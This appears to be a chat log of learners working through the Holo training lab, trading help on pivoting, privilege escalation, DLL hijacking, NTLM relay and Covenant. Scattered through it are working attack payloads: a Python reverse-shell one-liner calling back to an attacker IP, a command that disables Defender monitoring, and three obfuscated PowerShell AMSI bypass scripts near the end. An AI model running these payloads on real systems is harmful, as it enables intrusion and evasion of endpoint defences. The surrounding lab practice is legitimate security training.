Hi, I was working on Holo when I suddenly lost connectivity to its network. It looked like the environment "went to sleep" even though I was working on it actively. I started it again (10 minutes ago) but I can't ping or access any machine. I restarted my OpenVPN connection and even regenerated the package, but still no progress. Any clues?
Pinging just gives me a Destination Host Unreachable
Short question regarding Task 29.
The client-side filter and the AV are supposed to work, right? It is not supposed to accept every file and execute whatever payload I upload.
Because I was able to upload what I wanted, regardless of the file type, and the payload got executed like it should.
Someone could have edited the code on the server-side to remove the filter, and then proceeded to disable AV
I'm still struggling on task 9 from last night, if anyone has any insights into a direction I need to go; I'm a little stuck. Every time I run gobuster I get a 200 on every single item in the list. I have reset the network, so it's definitely something I am doing. The command I am running is gobuster vhost -u holo.live -w /usr/share/wordlists/dirb/common.txt
I have www.holo.live in the hosts file under the IP 10.200.133.33
Check what length each response has. After that you should be able to modify your command so the wrong directories won't appear anymore. Check gobuster's help for what options you have, as the length is just an example from my side
Thanks, I'll look at that. Appreciate it.
Gave +1 Rep to @ocean hare
You are welcome. Let me know if you need further help on that topic
Looks like I did it; couldn't quite figure it out in gobuster but did it in wfuzz and got the following results. ||'''admin and dev'''|| I used the following command: ||'''wfuzz -w /usr/share/wordlists/dirb/common.txt -H "Host: FUZZ.holo.live" -u http://10.200.133.33 --hc 400 --hh 21456'''||
Big thanks man
Weird, ||I can't log in to admin with the creds, but could an hour ago; can still access dev and www||
Hello, I'm kinda confused on what is going on in the pivoting section. I get how to use chisel and got that running, but I'm stuck on figuring out what is going on with proxychains and getting that to work. I edited the conf file and added socks5 127.0.0.1 1080, but I can't get anything back when I use curl. I've tried some combinations of my tun0 and localhost with the different ports, but nothing.
Try clearing your browser's cache
what is your curl command?
..., yep, I just needed to delete a cookie, thank you!
Gave +1 Rep to @ocean hare
I've tried many; proxychains4 curl http://IP:PORT (where IP is either localhost or my tun0, and PORT is either 1080 or 8000) are the variations I've tried
Correct me if I am wrong, you are trying:
curl http://127.0.0.1 or curl http://10.111.x.x (which is not the ip from the holo network)
For the second, it's my IP from the VPN file, not the server IP
From the section "Pivoting":
"To use the proxy, you will need to prepend any commands you want to route through the proxy with proxychains."
You don't want to access something on "your" system. You use chisel so your system knows how to redirect the traffic.
So sending a request with proxychains directs it to the chisel server, the chisel server directs it to the chisel client, which redirects it to the target you want to access.
So we want to use proxychains to send a request to the chisel server?
You use proxychains to send your request to the chisel server, which is connected to the Holo network, and you want to access a domain inside this network
It's like telling your terminal what to do with the request.
Stuck on Covenant setup for SharpEDRChecker
Never used Covenant before
Struggling to build it
SharpEDRChecker task
Can anyone help?
Tried Task 47 again where I need to reboot the Fileserver. Same as yesterday, the server didn't come back online.
I tried the easy way, used SharpShooter to make both a js and vbs shellcode runner that bypasses AMSI. Then I modified the suggested PHP executor file to run "cscript.exe" to use the Windows Scripting Host. Didn't seem to work. I'm just gonna stick with the way that THM said in the guide
I bypassed AMSI, got to the next box. Was seatbelt.exe supposed to be in the Downloads directory for the user on PC-FILESRV01? Because all of the sudden I couldn't get the AppLocker Bypass to work. Edit: Nevermind, completed Holo Live.
chisel is available as an ELF binary on Parrot by default. It can run in both server and client mode. You drop chisel on your victim while running chisel on your attacking machine as a server. Then you chmod +x chisel on the victim and run ./chisel client attackerIP:8000 R:socks to have it connect back to your attacking machine and create a SOCKS5 proxy that dynamically forwards requests and allows you to crackmapexec and xfreerdp to new targets on the network. It's also written in Go, and while the apt repo's install of chisel doesn't give you the source, you can clone the git repo to cross-compile it so the chisel client runs on Windows, Mac, FreeBSD, Linux and Unix machines.
What's the status of the relay thing?
Fully working
Hey guys can somebody help me with the PC-FILESRV01 Priv-Esc?
I was able to get the chisel server running; my issue was with using proxychains to get onto the internal network.
Can someone please help me with the AV part? I think I bypassed everything, but can't seem to catch a shell? Nvm, I think I got it
So I'm trying to get Covenant up and running but I'm coming across this issue: when I try to run the project with dotnet I get the error "Couldn't find a project to run. Ensure a project exists in ./Covenant/Covenant, or pass the path to the project using --project." and this is my command to run it: sudo dotnet run --project ./Covenant/Covenant. I also followed the steps outlined on this page to install the SDK: https://dotnet.microsoft.com/en-us/download/dotnet/thank-you/sdk-3.1.416-linux-x64-binaries
Well, I think I figured the error above out by running dotnet new console in the project area, but then when I try to run Covenant I'm missing a lot of stuff, so something might've gone wrong with my installation
All set! (so far). Maybe add that dotnet new console command to the instructions if others have come across the same issue?
Are you using Kali or Parrot? I installed the dotnet package on Parrot and everything worked fine, and followed the instructions to install Covenant from the challenge instructions on GitHub
I am using kali
Sure ! Dm !
Does the kavremover have a scheduled task? Because I can't get the session back, and with Get-ScheduledTask kavremover doesn't seem to be one of them
@opal scarab kavremover should be a scheduled task from Admin, so you wouldn't see it, but on my network I also can't get the kavremover DLL hijack to work
Thanks, probably someone broke the task
No, I also rebooted the whole network, no task there, but you're welcome to try; else you can use another exploit on that server
Do we have some AD Specialists in here who can help me to understand/learn something about TGS?
I am on this task: Task 20 Privilege Escalation, "Call me Mario, because I got all the bits"
When I do sudo install -m =xs $(which docker) . it asks for the www-data password?
I tried the passwords, that I already found
Docker is already installed, my friend
Sure
Could someone possibly DM me about understanding the AV section?
Can anyone help me with the Holo room?
I tried to escalate privileges on L-SRV01 and tried to execute the docker privesc script from GTFOBins, and it is showing 'Unable to find image 'alpine:latest' locally', which works for my friend perfectly well
Is the alpine container on the machine?
Check what alpine is. After that you should know what to check to change your command
alpine is not on the machine and cannot be downloaded either with that privilege
That's correct. What else is on the machine that could serve a similar purpose as alpine?
Goes in the right direction.
Why does the command you are trying to execute use "alpine"?
Try to find out a bit more about the docker instance running on the system and read the GTFOBins entry from the very beginning
Right! Thanks bro. I'll go try again
DM me if you still need help with that part
There is no other image like alpine on the machine either
Can I DM you? Because you are getting close and I don't want to include spoilers here
Someone here working on 10.200.132.x?
@lapis crescent Hey, were you able to get the DLL hijacking to work?
@ocean hare Hey, no, wasn't able to get that working, used a workaround
Alright, thanks. Will keep digging
I have issues connecting to the network
I've downloaded the network configuration file and connected using ovpn
yet I'm not able to access the machine which I was previously able to
All of a sudden it's not responding to any pings or requests
Can anyone give me a pointer on how to start to build the AMSI bypass?
I just pwned the host running the docker container (so I escaped the docker, and then privesc'd to root). Is there someone I can PM to get some insights to fully understand what I'm doing here?
Just google it. Don't overthink it. I actually tried for a few weeks to get that to work, just to end up using 3 lines of PowerShell..
Lol thanks, will try....
Gave +1 Rep to @sonic arch
Right after a network reset, someone crashed the webserver on the 10.200.108.0 network; this is getting really old
Hey, I can't seem to get the DLL hijacking working. I replaced what I think is the correct .dll, put it in what I think is the correct directory, but I don't get the callback
Is PC-FILESRV01 no longer vulnerable to PrintNightmare or am I doing it wrong?
Hi guys... Quick one... What happens when the days of access left for this network run out?
Will I have to start from scratch?
Room progress does not get reset.
I ended up uh- not even using PS lol
Grunts didn't work so I just went for the simplest thing I could think of, and it worked
netcat ftw!
Regarding privesc on FILESRV01, is the admin service not working? (subnet 146)
Is there anyone who can vote to reset Holo? I can't get a reverse shell from PC-FILESRV01. I guess someone deleted the scheduled tasks, so it doesn't give me a reverse shell even though I changed the DLL to my malicious DLL, and I couldn't find that scheduled task when I checked scheduled tasks with PowerShell
Yeah, same for subnet 146^
We're at 4/5 anyways so
Yeah, the admin task is still not running after the reset, so maybe I'll try another way to privesc
Hey guys.
Not quite sure how to go ahead with the AMSI bypass. I have the bypass ready. I tried running a PHP script that first runs the bypass code and then executes the reverse shell. Doesn't seem to work. I am not using Covenant for now, just trying to do this manually. Any hints?
Anyone available to help on the file upload portion in task 29?
Sure
Voice chat?
Sure, which room?
Medium study.
same 2 you
I don't know why, but the DLL hijacking won't work for me
Here is how I approached it, as the task made assumptions which did not work for me. We know that it is a Win box running PHP, so we can call on PHP to provide a route for commands (LFI), but at the same time we do know that stock scripts/code are not going to fly, so we can obfuscate (<key) some code that could be called by a native command from PHP.
To be honest this took a few hours of work, as I really wanted to avoid a Covenant fiasco, but it is certainly achievable without too much trouble; I found a Win VM to test what would and wouldn't pass AMSI invaluable. I hope that helps without giving the game away....
Ah... thanks mate, I'll try this.
Gave +1 Rep to @low tinsel
Someone on Holo rn?
Yes, till a few moments ago, when the network turned out to be unreachable... sigh
I am getting this error when I try to run a Covenant grunt
I re-installed Covenant, I tried different grunts etc, but all lead to this error
Can anyone access Holo rn? The first server is unreachable for me
Same here..
Man... this is happening a lot with Holo on the weekend. Gotta wait for a reset
Same happened when I was in the privesc of task 20. Someone started deleting random files with sudo permissions and then the whole thing went down
Left the room, rejoined and it worked again... Without reset.
Aaaaaand here we go again, lol...
@sonic arch rip. Thanks though, that seems to have worked
Gave +1 Rep to @sonic arch
It's infuriating how slow it is though. Just getting the first steps in is frustrating as hell
Is the NTLM relay attack supposed to work again?
Guys, reset?
Yes it does, did it a couple of days ago.
Darn it.. Then I just suck.. lol
It should work if you follow the guide, but it's in the details.
I just started to read into this topic, but the main issue I face atm is that I can't use RDP to log in with the local administrator on PC-FILESRV01. But via evil-winrm it works. Does it make a difference if I privesc via PrintNightmare or, now that it's fixed, the DLL hijacking?
Uiuiuiuiui.. NVM, found it. Time for an epic facepalm..
Having trouble with PC-FILESRV01 - creds being rejected - "SPNEGO received NTSTATUS: STATUS_NETLOGON_NOT_STARTED [0xC0000192] from server". Threads in this room indicate I am on the right route, so have voted for a reset - anything else I can do?
Any help? For Remote NTLM Relay, I tried more than 6 times rebooting the machine and trying to get a shell, but still no connection comes
Someone has disabled NetLogon on that server, this is part of the remote NTLM relay. You should still be able to login with the rdesktop RDP client.
Any help?
It looks like ntlmrelayx is having trouble communicating with 10.200.120.30.
That doesn't necessarily mean something is wrong with 10.200.120.30
It means there may be something wrong with your pivot
I will check this again
Yes, you are right 🙂 I was pivoting with chisel before; I couldn't use it with ntlmrelayx. This time I used ntlmrelayx with sshuttle, and it worked
I uploaded the .php via the image upload, but am unable to call the .php to run via http://10.200.114.31/ra.php; also tried with http://10.200.114.31/img/ra.php
Can anyone explain why getting a stable shell on L-SRV01 is so difficult?
Literally nothing works except for nc -c
And pty isn't working at all
I want to move on to the docker stuff but I can't get a usable shell on this box
After some experimenting, this command seems to work (URL encoded)
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.50.112.120",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
But nothing else I've tried does it
I can't get any binary on the system to send a connection, except for netcat and python3 via this one singular command, and I have no idea why
Thanks for the reply. Today xfreerdp (where the netlogon msg came from) is still not working, however remmina is working, which it did not yesterday. Only issue is that I picked up someone else's RDP session (apologised and handed it back to them). No route with crackmap or evil-winrm, and have tried sshuttle and chisel. Guess I will have to wait until I see the network drop due to inactivity so I can grab the RDP session; in the meantime I will have a look at other options on the box
Gave +1 Rep to @solid oasis
10.200.110.x subnet has issues with the DLL takeover
My subscription ends within a few days, someone help me out with resets
2/5
Anyone free to discuss task 43 (DLL hijacking) please?
What's up with task 9 - gobuster vhost? The website has no specific URL, only an IP address. Does running the scan with the IP address instead of the URL still give results?
No.
So the network seems to have been reset (new SSH host keys) but still having a bit of trouble with PC-FILESRV01. RDP login now has login restrictions applied to it and crackmap now sees .35, but the expected access does not occur, though it does work for S-SRV01 - is there any other route?
SMB 10.200.123.35 445 PC-FILESRV01 [+] HOLOLIVE\wxxxxx:xxxxxxxxxxxxxxc9
SMB 10.200.123.30 445 DC-SRV01 [+] HOLOLIVE\wxxxxx:xxxxxxxxxxxxxxc9
SMB 10.200.123.31 445 S-SRV01 [+] HOLOLIVE\wxxxxx:xxxxxxxxxxxxxxc9 (Pwn3d!)
Who can I msg to confirm something on the Holo Active Directory machine? Don't want to spoil it
Anyone else's Microsoft Edge went berserk too when I tried to visit the Holo page?
Your AV probably freaked out at seeing the AMSI bypass template code that's displayed in some of the tasks
We've dropped a message in the Slack - historically, we've been able to clear some of these things up with AV vendors
😂 😂 😂 😂 😂 😂 😂 😂 😂 😂
It's happening with many boxes out here
You must check pivoting if you are using chisel; try to use sshuttle, my problem was that
Just finished, great journey - kudos to the creators and those in here helping out. Pretty much worked as designed in hindsight, but I would treat the steps more as guidelines, which is great because it helped me think about other options or routes (many did not work for me but they are all skill builders!)
Have some questions. Can I DM?
Sure. If the answer benefits the room, e.g. something should have worked but didn't, I will put it up for all
Can someone help me with DLL hijacking
Hey bro, can I DM? I have some doubts on task 43
Someone who finished the AMSI bypass, can you help me find the right resources to solve the FILESRV01 privesc?
I also need help with DLL hijacking
Uploaded the malicious DLL but can't get a reverse shell
cool
Still finding a way to get a reverse shell on the Windows box; I have RCE already but can't seem to get a shell back to my terminal
cool
I hope Throwback has personal instances, because other networks are unplayable when a dumb guy is on them..
lol
Can't access the admin.holo.live/dashboard.php for the RCE and that's really boring...
The page has just been hanging for 5 min and I can't get on the dashboard, and I'm sure I'm the only one who started this section 😢
let's go to DANTE...
Strange, works fine on my end
You can access the dashboard?
The login page is okay, but when I enter the good creds found previously the page loads and loads and loads and loads xD
thanks for your time 😉
yes bro i can
||admin:D*********||??
I will stop the lab and restart
ok bro
Yeah, with a ! at the end 🙂
thank you for the time you took to check it
yes bro
It's cool, maybe restart it
Does someone think that from srv01 there is a chance to also pwn the DC?
And not from filesrv01?
I "just" have to root filesrv01 and the DC now
You are on the right track if you have doubts on q43 - have a look back through the room - there is another totally different approach which just works
🤔🤔🤔
Can I DM?? I'm stuck and can't understand where I'm going wrong
13/12/2021 posts in this room - works a treat
Can anyone help me on task 13? I tried a number of different variations of wfuzz commands, I am not getting anywhere though.
All these networks are down every time...
Since yesterday admin.holo.live/dashboard can't be accessed...
It is a nightmare, but not in a positive way... how to play if I can't access it xD
I tried leaving the room and coming back, nothing...
Have you cleared your cookies?
Yeah
I can connect to the admin subdomain but can't access the dashboard even with the good creds found previously
Yesterday I had a rev shell on it but had to go, and when I came back I restarted the network and can't access the dashboard since then. I tried leaving the room and coming back to the room, cleared cookies for THM and the admin subdomain, etc etc
It is back now
Anyway, thank you for your time
I had the same issue and clearing your browsers cookies and cache did the trick for me
Do you have an issue getting a shell on the Windows host bro??
Been on it for 2 days straight now
For 10.200.x.31 or 10.200.x.35?
Have RCE on 10.200.x.31 but can't seem to get a reverse shell back to my terminal; can I DM to avoid spoilers?
@wide aspen are you still working on 10.200.120.x?
No, I finished
Probably pass the hash
Yeah, but the machine that runs Responder is pwned by itself
I can't run ntlmrelayx there
So I need to send the hash from the docker machine to my machine for relay, and without ntlmrelayx. I'm trying to find a solution
What target are u on, 10.200.xxx.31??
I'm on 33
Sorry lol, didn't know what that was haha
I'll explain. On 33 I run Responder. I get the DC hash. But I can't run ntlmrelayx there because there are no impacket repos there
You know 33 is Linux, right??
Why not pivot to 31
I pwned the SRV1 system, Linux root, and I just have user on filesrv01
watamet??
Yep
Did u pivot to different users?
I see a lot of users on that AD with PowerView
When I dump the hashes with mimikatz, that's how I got the hash for watamet
Yeah, same for me
lol and that's where I'm stuck
On AppLocker bypass?
Check DM to avoid spoilers
Yo, task 43, still can't get the DLL to connect. Anyone know why... is it broken, or is it anything I have done? I did it as it should be done
Yo, could u help me with task 43? It's the DLL, and I have done it how it's supposed to be (I think) and it still doesn't work
Same
Now it seems everything is down, can't access machines anymore
It's insane, I tested multiple exploits with Metasploit and all I get is just a meterpreter shell (basic one), and then I can't escalate my privileges
Hacking is not only about Metasploit bro
Actually I'm pretty happy to experience difficulties with the AMSI bypass and AppLocker bypass because it makes me want to understand every protocol and endpoint defense more deeply
Yeah Mr. Obvious, we know that.... but it's a good place to start and test things out
It doesn't look so obvious for you lol
Anyway, I didn't say that to talk bad to u
It is obvious.. but if I have 4 exploits I know and can test in a matter of seconds I might as well
Agree
There are also many false positives from winPEAS
Hi, I have some trouble with Task 18: "What user is the database running as?" I have ps output with full user names (not truncated), but the username for the mysqld process is not a valid answer (the truncated version of that user is also not valid). What should I put there?
At that point you have a user shell right? Which you got through the web app
Yes, I have; I also have a reverse shell from L-SRV01
So you know which user is running the web app, right? And you are able to access the database
OK, I got it. I thought it was about the user the database is started as (ps axu | grep mysql)
you thought just a bit too far 😉
Who else got this issue? I am using Covenant, but somehow I'm getting this error
Guys, how do I find the application for DLL hijacking? I cannot find it in the PEAS outputs or Get-ScheduledTask outputs
My ntlmrelayx.py is erroring out with "smbclient error: connection was reset", any hints?
In Task 29 the JS filters & AV must have blocked our file upload, but I didn't find any issue while uploading the file to the server
Also I got the reverse shell & got the root flag without any issues, which clearly means that AV is disabled; is it intended?
There's nothing stopping someone from turning off AV, and while the network creators have advised against doing that (both from a learning and a courtesy perspective), people do it anyway.
You can run sc query windefend on the Windows machine to check the status of AV.
Also someone might have edited out the client-side filter
is it only for this subnet: 10.200.133.0/24?
because in previous messages as well, a few of the users posted the same doubt
@lone spruce @final patio
if someone can reset 119 it will be cool
Is .33 supposed to have an http service running on port :80? The only open port I see is :22 (.95 subnet)
my bad, they reset the network 😢
can someone use evil-winrm to connect to PC-FILESRV01???
can't make it work
some help is welcome 🙂
Can anyone confirm on Task 43 there should be a scheduled task set up for non-windows directory app (don't want to give too much away)
@frozen iron I had no success with winrm on that server, no idea why. Could crackmapexec with SMB and RDP. But winrm failed with both password and hash
ok thank you for the help 🙂
Gave +1 Rep to @minor flax
I'm sure PSRemoting isn't enabled, maybe they forgot :p
```powershell
PS C:\Users\watamet> Test-WSMan -Authentication default
wsmid           : http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd
ProtocolVersion : http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd
ProductVendor   : Microsoft Corporation
ProductVersion  : OS: 10.0.17763 SP: 0.0 Stack: 3.0
```
Should be working, but literally no idea
yeah should be 🙂
I literally just waited 15 min trying things and it was just the lab time which expired xD
ooo, so rebooting it has fixed it?
I think I need a full reset for scheduled tasks to fix, which luckily is tomorrow
nope it doesnt fix it i was trying something else in the same time
Can anyone confirm on Task 43 there should be a scheduled task set up for non-windows directory app (don't want to give too much away)
Without this I don't think I can complete the task, and therefore the further tasks and it's really annoying
Turns out after a reset there still isn't a scheduled task.
I also can't find the scheduled task... vote for reset 147.35
The network got reset and there isn't a scheduled task. I'm utterly baffled
@unreal flicker what do you get if you try and run the application? Trying to see if it's the exact mirror of what's happening to me
it says that only administrator can run the program
Yeah exactly the same as I get.
How annoying! We are so close!
vote for resetting the network, maybe the second time it will help
On different networks sadly.
Is it a room bug maybe? Might be worth reporting?
In task 48 I have sshuttle set up to .33 and can connect to dc01 (checked with smbclient -l). ntlmrelayx says it creates the connection to 445 but then psexec and smbexec both get 127.0.0.1:1080 <-> 10.200.95.30:445 connection denied. I also tried to use psexec -t 10.200.95.35 -c 'path-to-shell.exe' to run a meterpreter shell in the context of srv-admin on filesrv but it doesn't seem like it ever gets run. did anyone solve this task recently that I could compare with?
@trim totem help me with getting an admin shell on FILESRV01 and I'll do this bit tomorrow and help out.
(See up for the issues with scheduled tasks)
I didn't have the scheduled task either, I just added a new local admin with Print-Nightmare and then you can run a command shell as nt auth/sys to get domain context
Ahhh that's great thinking!! I'll try that tomorrow and do the ntlm relay stuff and try to help out!
^ ended up using ntlmrelayx's interactive mode and that worked
What's your problem @timid moss
Always ask questions directly because people generally don't lose time like that ;)
On the AMSI bypass part, when I try to bypass AMSI from my webshell I can't make it work, can someone help me?
The method to bypass AMSI doesn't work for me rn, the first time I just disabled it since I saw I was SYSTEM but after that I see there is an AMSI bypass section
It seems the [PSObject] doesn't work
I tried multiple concatenations and PSObject, which doesn't work on the webshell
Maybe I will try directly in PowerShell to see if it is really the webshell that breaks the whole thing
So if someone made it work through the webshell, can you share it in DM
:'(
hi, it seems that .108.35 is missing scheduled task, will network reset restore it?
ah, nevermind, I see that there is another way
thanks for the help xD
when you close the SMB port were you still able to access RDP??
i guess so
sad because that's a great skill to learn, one of the best here with the applocker bypass but even the applocker bypass people skip it xD
you just disabled it since we are SYSTEM?
@heavy shoal
lol I was able to bypass AppLocker, I also tried some AMSI bypasses, it's really fun to learn
I skipped the AMSI bypass since I have my kid around playing PlayStation and screaming but now I've come back to it and it seems my shell breaks the bypass I think
can't make it work
but when I try it when I get a real shell on the machine it works
I don't know what my webshell breaks
lol cool
now that is cool
still on the webshell ??
yeah but no because i want to find a bypass that works from the webshell
yeah i came back to the webshell part to try to find what is the problem
from the webshell also seems it possible to change the admin credentials
did you note what bypass you used from your webshell to bypass it?
sure bro
from the webshell you can do all you want since we are SYSTEM, you can even disable all the security but it seems the amsi bypass they give should work from the webshell but idk why it doesnt on my side
thank you
Gave +1 Rep to @heavy shoal
I was able to bypass it once but when I try it again it keeps dropping, check DM, let me send you what I use
same thing, but I think it works the first time because someone on the network disabled AMSI directly, at least in my case
yes possible
when I get DC I will reset and find a way to bypass it again
yeah let me know when you did it 🙂
I will try on my side and if not from the webshell I will do some research directly from the machine
or in my home lab directly
sure bro, I'm still on ntlmrelayx.py lol
GL 🙂
cool
thanks bro, you too 👍🏻
Gave +1 Rep to @frozen iron
if someone has an AMSI bypass that worked from the webshell and can DM me I will be generous :p
yes with rdesktop
The exact method from the tutorial didn't work for me either, but if you look up other AMSI bypasses online and try recoding / obfuscating one it should be fairly easy to get a working bypass
I just figured out that it wasn't AMSI that was my problem, it was Defender xD
I disabled Defender but kept AMSI and it works
so I worked on Defender and AMSI and now it is working like a charm
I wasn't able to get the AMSI bypass to work. Just used a PHP webshell
since we are already SYSTEM I don't understand the need to bypass AMSI since we can disable everything xD
thanks everyone for helping!!!
The webshell was SYSTEM so I added a new user, added them to admins & remote desktop users and RDPed in
I basically said fuck Covenant at that point
actually that's a lie. From RDP I opened PowerShell ISE and copied in the obfuscated PS Launcher from Covenant. (When you create it you can copy it as obfuscated) and this worked.
But I may have manually turned off Defender at this point, because I could
yeah, but that wasn't the real learning objective, that's why I wanted to dig into it, because the first time I did it without reading the objective I just ran Set-MpPreference -DisableRealtimeMonitoring $true from my webshell and after that I executed a beacon directly from pwsh
I think something is messed up with instructions versus state of the network. I also had system on s-srv01, so I skipped some AMSI related tasks. Also, later there are references to s-srv02 (task 48) but previous tasks don't mention that server (only s-srv01 & pc-filesrv01), so something needs to be updated in tasks description, because it's a bit confusing at the end.
yeah some update will be welcome
because it is like the [PSObject] part in AMSI which doesn't work anymore since PowerShell 4.0 xD
nope my bad, it wasn't that part xD
strange, any time I stop SMB I was unable to access RDP again until I reset the network
I have no idea what I am doing wrong
```powershell
# Flip the "init failed" flag in the AMSI utils class so the engine
# reports itself as uninitialised and the scan is skipped.
# The type and field names are split so the script text itself does
# not contain the literal strings AMSI signatures look for.
$w = 'System.Management.Automation.A'
$c = 'si'
$m = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w, $c, $m))
$field = $assembly.GetField(('am{0}InitFailed' -f $c), 'NonPublic,Static')
$field.SetValue($null, $true)
```
that one works
amsi bypassed
cool, stealing it from you XD
for sure that's why i posted it 😉
I felt the entire AV evasion explanations weren't overly helpful. I wanted to learn it and just got frustrated at what it was telling me
I think I got AMSI Bypass working with:
```powershell
# Patch the start of the scan function exported by amsi.dll with
#   mov eax, 0x80070057 (E_INVALIDARG) ; ret
# so every scan returns an error and the buffer is treated as clean.
# The Marshal type is registered under an alias and the export name is
# concatenated at runtime so the script itself does not contain the strings
# AMSI signatures look for.
$TAType = [PSObject].Assembly.GetType("System.Management.Automation.TypeAccelerators")
$TAType::Add('Yekki', [System.Runtime.InteropServices.Marshal])
$MethodDefinition = @"
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
"@
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru
$ABSD = 'AmsiS' + 'canBuffer'
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll')
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD)
[UInt32]$Size = 0x5                 # VirtualProtect works on whole pages, so this still covers the 6-byte patch
[UInt32]$ProtectFlag = 0x40         # PAGE_EXECUTE_READWRITE
[UInt32]$OldProtectFlag = 0
# make the function prologue writable, then overwrite it
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag)
$buf = [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[Yekki]::Copy($buf, 0, $BufferAddress, 6)
```
but yours seems wayy easier
Turns out I tried that on the box:
Not ideal
be careful because if someone before you disabled it
i will try it
but it is a trial and error thing like AV evasion
Yeah, that worked on my own VM. Not sure what happened on their box
ok thanks for sharing 🙂
I think the webshell doesn't help xD
it is like the evil-winrm thing in whatever task which doesn't work either, even though it should work xD
Yeah still didn't work that one out!
happy we found some bypasses 🙂
it would be sad to have this entire section being fully useless
haha I know right
I've written a walkthrough and these sections are really rather light on info 😐
```powershell
# Same patch of the amsi.dll scan export as above, with the VirtualProtect
# name and the Marshal alias built at runtime to dodge string signatures.
$OBS = ('Vi' + 'r' + 'tua' + 'l' + 'Pr' + 'o' + 't' + 'ec' + 't')
$TAType = [psobject].Assembly.GetType("System.Management.Automation.TypeAccelerators")
$TAType::Add('dorkstork', [System.Runtime.InteropServices.Marshal])
$MethodDefinition = @"
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
"@
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru
$ABSD = 'AmsiS' + 'canBuffer'
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll')
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD)
[UInt32]$Size = 0x5
[UInt32]$ProtectFlag = 0x40         # PAGE_EXECUTE_READWRITE
[UInt32]$OldProtectFlag = 0
# $OBS resolves to VirtualProtect at runtime
[Win32.Kernel32]::$OBS($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag)
$buf = [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)   # mov eax, 0x80070057 ; ret
[dorkstork]::Copy($buf, 0, $BufferAddress, 6)
```
this one works too
but on their machine it doesn't work xD
haha any ideas why?
I must try it when the machine is in a cleaner state, since I tried so many things and other users may have done the same xD
not a single one xD
Print Nightmare works easily enough though! So that's nice I guess
Scratch that, didn't appear to create the user.
Password complexity is hard 😄
So the theory of the DLL hijacking is right. I just did it with my admin user, and it worked as expected. If only that scheduled task was there!
does anyone know why I can't read the shadow file? And there is no wget, though I don't know what is wrong. Thanks~
You’re reading it, you’re just in a docker container
The room walks you through every step of the escape
Read carefully 🙂
ahh I see
thank youu~
Gave +1 Rep to @cinder notch
I can't even connect to the webserver on admin, it's like the web server is dead on that machine 😦
one thing people commonly do is stop the docker container running the web server
we can't do much about that other than advise you to request a reset
when users have root perms on machines, they tend to be able to break things
lol, imagine that
How do you pass HTTP traffic through the tunnel created for pivoting? Proxychains is set up, but I'm not sure how to set it up where I can browse the web as if I'm on the other machine.
If you have proxychains you can proxychains your browser.
So on Kali
proxychains firefox
However, I'd really recommend getting sshuttle sorted, as it will be hell-ish later on without it
Couldn't you use FoxyProxy and configure it to work with whatever proxy (SOCKS4 or SOCKS5) you're using?